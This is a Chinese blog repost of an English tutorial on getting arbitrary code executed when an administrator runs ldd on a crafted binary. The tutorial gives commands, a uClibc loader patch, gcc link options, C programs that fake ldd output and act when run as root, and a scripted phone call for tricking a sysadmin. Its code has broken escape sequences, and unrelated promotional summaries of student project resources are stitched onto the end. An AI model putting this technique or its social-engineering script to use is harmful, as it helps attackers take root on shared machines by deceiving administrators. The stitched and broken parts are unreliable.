a bug on ldd

ldd工具可能比你想象的更容易被攻击。程序员和系统管理员经常使用ldd工具在Linux和UNIX操作系统内列出可执行文件所依赖的共享库。但是一位黑客用事例证明,在一个可执行文件中运行ldd,可能会导致其执行任意代码。

一位用户指出,这个问题很早被发现了,"Program Library HOWTO"就警告:不要在自己不信任的程序内运行ldd,ldd是通过设置特殊的环境变量工作和运行程序的,一个可疑的程序可能会迫使ldd用户执行任意的代码,而不是列出共享库。

 

ldd arbitrary code execution
The `ldd` utility is more vulnerable than you think. It's frequently used by programmers and system administrators to determine the dynamic library dependencies of executables. Sounds pretty innocent, right? Wrong!
In this article I am going to show you how to create an executable that runs arbitrary code if it's examined by `ldd`. I have also written a social engineering scenario on how you can get your sysadmin to unknowingly hand you his privileges.

I researched this subject thoroughly and found that it's almost completely undocumented. I have no idea how this could have gone unnoticed for such a long time. Here are the only few documents that mention this interesting behavior: 1, 2, 3, 4.

First let's understand how `ldd` works. Take a look at these three examples:

[1] $ ldd /bin/grep
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/libc.so.6 (0xb7eca000)
/lib/ld-linux.so.2 (0xb801e000)

[2] $ LD_TRACE_LOADED_OBJECTS=1 /bin/grep
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/libc.so.6 (0xb7e30000)
/lib/ld-linux.so.2 (0xb7f84000)

[3] $ LD_TRACE_LOADED_OBJECTS=1 /lib/ld-linux.so.2 /bin/grep
linux-gate.so.1 => (0xffffe000)
libc.so.6 => /lib/libc.so.6 (0xb7f7c000)
/lib/ld-linux.so.2 (0xb80d0000)
The first command [1] runs `ldd` on `/bin/grep`. The output is what we expect - a list of dynamic libraries that `/bin/grep` depends on.

The second command [2] sets the LD_TRACE_LOADED_OBJECTS environment variable and seemingly executes `/bin/grep` (but not quite). Surprisingly the output is the same!

The third command [3] again sets the LD_TRACE_LOADED_OBJECTS environment variable, calls the dynamic linker/loader `ld-linux.so` and passes `/bin/grep` to it as an argument. The output is again the same!

What's going on here?

It turns out that `ldd` is nothing more than a wrapper around the 2nd and 3rd command. In the 2nd and 3rd example `/bin/grep` was never run. That's a peculiarity of the GNU dynamic loader. If it notices the LD_TRACE_LOADED_OBJECTS environment variable, it never executes the program, it outputs the list of dynamic library dependencies and quits. (On BSD `ldd` is a C program that does the same.)

If you are on Linux, take a look at the `ldd` executable. You'll find that it's actually a bash script. If you step through it very carefully, you'll notice that the 2nd command gets executed if the program specified to `ldd` can't be loaded by the `ld-linux.so` loader, and that the 3rd command gets executed if it can.

One particular case when a program won't be handled by `ld-linux.so` is when it has a different loader than the system's default specified in it's .interp ELF section. That's the whole idea in executing arbitrary code with `ldd` - load the executable via a different loader that does not handle LD_TRACE_LOADED_OBJECTS environment variable but instead executes the program.

For example, you can put a malicious executable in ~/app/bin/exec and have it loaded by ~/app/lib/loader.so. If someone does `ldd /home/you/app/bin/exec` then it's game over for them. They just ran the nasty code you had put in your executable. You can do some social engineering to get the sysadmin to execute `ldd` on your executable allowing you to gain the control over the box.

Compiling the new loader.

Get the uClibc C library. It has pretty code and can be easily patched to bypass the LD_TRACE_LOADED_OBJECTS checks.

$ mkdir app
$ cd app
app$ wget 'http://www.uclibc.org/downloads/uClibc-0.9.30.1.tar.bz2'
Unpack it and run `make menuconfig`, choose the target architecture (most likely i386), leave everything else unchanged.

app$ bunzip2 < uClibc-0.9.30.1.tar.bz2 | tar -vx
app$ rm -rf uClibc-0.9.30.1.tar.bz2
app$ cd uClibc-0.9.30.1
app/uClibc-0.9.30.1$ make menuconfig
Edit .config and set the destination install directory to `/home/you/app/uclibc`.

# change these two lines
RUNTIME_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/"
DEVEL_PREFIX="/usr/$(TARGET_ARCH)-linux-uclibc/usr/"

# to this
RUNTIME_PREFIX="/home/you/app/uclibc/"
DEVEL_PREFIX="/home/you/app/uclibc/usr/"
Now we'll need to patch it to bypass LD_TRACE_LOADED_OBJECTS check.

Here is the patch. It patches the `ldso/ldso/ldso.c` file. Save the patch to a file and run `patch -p0 < file`. If you don't do it, arbitrary code execution won't work, because it will think that `ldd` wants to list dependencies.

--- ldso/ldso/ldso-orig.c 2009-10-25 00:27:12.000000000 +0300
+++ ldso/ldso/ldso.c 2009-10-25 00:27:22.000000000 +0300
@@ -404,9 +404,11 @@
}
#endif

+ /*
if (_dl_getenv("LD_TRACE_LOADED_OBJECTS", envp) != NULL) {
trace_loaded_objects++;
}
+ */

#ifndef __LDSO_LDD_SUPPORT__
if (trace_loaded_objects) {
Now compile and install it.

app/uClibc-0.9.30.1$ make -j 4
app/uClibc-0.9.30.1$ make install
This will install the uClibc loader and libc library to /home/you/app/uclibc.

That's it. We have now installed uClibc. All we have to do now is link our executable with uClibc's loader (app/lib/ld-uClibc.so.0). It will execute the code if run under `ldd`!

Creating and linking an executable with uClibc's loader.

First let's create a test application that will just print something when executed via `ldd` and let's put it in `app/bin/myapp`

app/uClibc-0.9.30.1$ cd ..
app$ mkdir bin
app$ cd bin
app/bin$ vim myapp.c
Let's write the following in `myapp.c`.

#include <stdio.h>
#include <stdlib.h>

int main() {
if (getenv("LD_TRACE_LOADED_OBJECTS")) {
printf("All your box are belong to me./n");
}
else {
printf("Nothing./n");
}
return 0;
}
This is the most basic code. It checks if LD_TRACE_LOADED_OBJECTS env variable is set or not. If the variable set, the program acts maliciously but if it's not, the program acts as if nothing happened.

The compilation is somewhat complicated because we have to link with the new C library statically (because anyone who might execute our program via `ldd` will not have our new C library in their LD_LIBRARY_PATH) and specify the new loader:

app/bin$ L=/home/you/app/uclibc
app/bin$ gcc -Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 /
-Wl,-rpath-link,$L/lib /
-nostdlib /
myapp.c -o myapp /
$L/usr/lib/crt*.o /
-L$L/usr/lib/ /
-lc
Here is the explanation of options passed to gcc:

-Wl,--dynamic-linker,$L/lib/ld-uClibc.so.0 - specifies the new loader,
-Wl,-rpath-link,$L/lib - specifies the primary directory where the dynamic loader will look for dependencies,
-nostdlib - don't use system libraries,
myapp.c -o myapp - compile myapp.c to executable myapp,
$L/usr/lib/crt*.o - statically link to initial runtime code, function prolog, epilog,
-L$L/usr/lib/ - search for libc in this directory,
-lc - link with the C library.
Now let's run the new `myapp` executable. First, without ldd:

app/bin$ ./myapp
Nothing.
LD_TRACE_LOADED_OBJECTS environment variable was not set and the program output "Nothing." as expected.

Now let's run it via `ldd` and for the maximum effect, let's run it from the root shell, as if I was the sysadmin:

app/bin$ su
Password:
app/bin# ldd ./myapp
All your box are belong to me.
Wow! The sysadmin just executed our exploit! He lost the system.

A more sophisticated example.

Here is a more sophisticated example that I just came up with. When run without `ldd` this application fails with a fictitious "error while loading shared libraries" error. When run under `ldd` it checks if the person is root, and owns the box. After that it fakes `ldd` output and pretends to have `libat.so.0` missing.

This code needs a lot of improvements and just illustrates the main ideas.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/*
This example pretends to have a fictitious library 'libat.so.0' missing.
When someone with root permissions runs `ldd this_program`, it does
something nasty in malicious() function.

I haven't implemented anything malicious but have written down some ideas
of what could be done.

This is, of course, a joke program. To make it look more real, you'd have
to bump its size, add some more dependencies, simulate trying to open the
missing library, detect if ran under debugger or strace and do absolutely
nothing suspicious, etc.
*/

void pretend_as_ldd()
{
printf("/tlinux-gate.so.1 => (0xffffe000)/n");
printf("/tlibat.so.0 => not found/n");
printf("/tlibc.so.6 => /lib/libc.so.6 (0xb7ec3000)/n");
printf("/t/lib/ld-linux.so.2 (0xb8017000)/n");
}

void malicious()
{
if (geteuid() == 0) {
/* we are root ... */
printf("poof, all your box are belong to us/n");

/* silently add a new user to /etc/passwd, */
/* or create a suid=0 program that you can later execute, */
/* or do something really nasty */
}
}

int main(int argc, char **argv)
{
if (getenv("LD_TRACE_LOADED_OBJECTS")) {
malicious();
pretend_as_ldd();
return 0;
}

printf("%s: error while loading shared libraries: libat.so.0: "
"cannot open shared object file: No such file or directory/n",
argv[0]);
return 127;
}
Actually you can put the code you want to get executed right in the loader itself. This way the executable will always look clean.

Social engineering.

Most system administrators probably don't know that they should never run `ldd` on unfamiliar executables.

Here is a fake scenario on how to get your sysadmin run `ldd` on your executable.

Sysadmin's phone: ring, ring.

Sysadmin: "Mr. sysadmin here. How can I help you?"

You: "Hi. An app that I have been using has started misbehaving. I am getting weird dependency errors. Could you see what is wrong?"

Sysadmin: "Sure. What app is it?"

You: "It's in my home directory, /home/carl/app/bin/myapp. Sometimes when I run it, it says something about ‘error while loading shared libraries'."

Sysadmin: "Just a sec." noise from keyboard in the background

Sysadmin: "What was it again? It must be some kind of a library problem. I am going to check its dependencies."

You: "Thanks, it's /home/carl/app/bin/myapp."

Sysadmin: "Hmm. It says it's missing `libat.so.0`, ever heard of it?"

You: "Nope, no idea... I really need to get my work done, can you check on that and get back to me?" evil grin in the background

Sysadmin: "Okay Carl, I'm gonna call you back."

You: "Thanks! See ya."

You: `mv ~/.hidden/working_app ~/app/bin/myapp`.

After a while.

Sysadmin calls: "Hi. It seems to be working now. I don't know what the problem was."

You: "Oh, okay. Thanks!"

Lesson to be learned: Never run `ldd` on unknown executables!

P.S. If you enjoyed this article subscribe to my future posts! I have many more quality articles coming.

 

经过实验,这个䒈BUG已经不存在了,简单的翻译一下吧:

ldd用于列出程序依赖的动态库,起原理是,通过设置LD_TRACE_LOADED_OBJECTS=1,调用/lib/ld-linux.so.2,并把程序名作为参数传给动态链接器,我们写一个不能被ld-linux.so.2加载的程序,并把加载器链接到程序里,这样系统就会调用我们的程序,so,if getuid()==0 do wath ever u want...

但这个BUG已经不再了

 

内容概要:文章以“智能网页数据标注工具”为例,深入探讨了谷歌浏览器扩展在毕业设计中的实战应用。通过开发具备实体识别、情感分类等功能的浏览器扩展,学生能够融合前端开发、自然语言处理(NLP)、本地存储与模型推理等技术,实现高效的网页数据标注系统。文中详细解析了扩展的技术架构,涵盖Manifest V3配置、内容脚本与Service Worker协作、TensorFlow.js模型在浏览器端的轻量化部署与推理流程,并提供了核心代码实现,包括文本选择、标注工具栏动态生成、高亮显示及模型预测功能。同时展望了多模态标注、主动学习与边缘计算协同等未来发展方向。; 适合人群:具备前端开发基础、熟悉JavaScript和浏览器机制,有一定AI模型应用经验的计算机相关专业本科生或研究生,尤其适合将浏览器扩展与人工智能结合进行毕业设计的学生。; 使用场景及目标:①掌握浏览器扩展开发全流程,理解内容脚本、Service Worker与弹出页的通信机制;②实现在浏览器端运行轻量级AI模型(如NER、情感分析)的技术方案;③构建可用于真实场景的数据标注工具,提升标注效率并探索主动学习、协同标注等智能化功能。; 阅读建议:建议结合代码实例搭建开发环境,逐步实现标注功能并集成本地模型推理。重点关注模型轻量化、内存管理与DOM操作的稳定性,在实践中理解浏览器扩展的安全机制与性能优化策略。
基于Gin+GORM+Casbin+Vue.js的权限管理系统是一个采用前后端分离架构的企业级权限管理解决方案,专为软件工程和计算机科学专业的毕业设计项目开发。该系统基于Go语言构建后端服务,结合Vue.js前端框架,实现了完整的权限控制和管理功能,适用于各类需要精细化权限管理的应用场景。 系统后端采用Gin作为Web框架,提供高性能的HTTP服务;使用GORM作为ORM框架,简化数据库操作;集成Casbin实现灵活的权限控制模型。前端基于vue-element-admin模板开发,提供现代化的用户界面和交互体验。系统采用分层架构和模块化设计,确保代码的可维护性和可扩展性。 主要功能包括用户管理、角色管理、权限管理、菜单管理、操作日志等核心模块。用户管理模块支持用户信息的增删改查和状态管理;角色管理模块允许定义不同角色并分配相应权限;权限管理模块基于Casbin实现细粒度的访问控制;菜单管理模块动态生成前端导航菜单;操作日志模块记录系统关键操作,便于审计和追踪。 技术栈方面,后端使用Go语言开发,结合Gin、GORM、Casbin等成熟框架;前端使用Vue.js、Element UI等现代前端技术;数据库支持MySQL、PostgreSQL等主流关系型数据库;采用RESTful API设计规范,确保前后端通信的标准化。系统还应用了单例模式、工厂模式、依赖注入等设计模式,提升代码质量和可测试性。 该权限管理系统适用于企业管理系统、内部办公平台、多租户SaaS应用等需要复杂权限控制的场景。作为毕业设计项目,它提供了完整的源码和论文文档,帮助学生深入理解前后端分离架构、权限控制原理、现代Web开发技术等关键知识点。系统设计规范,代码结构清晰,注释完整,非常适合作为计算机相关专业的毕业设计参考或实际项目开发的基础框架。 资源包含完整的系统源码、数据库设计文档、部署说明和毕
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值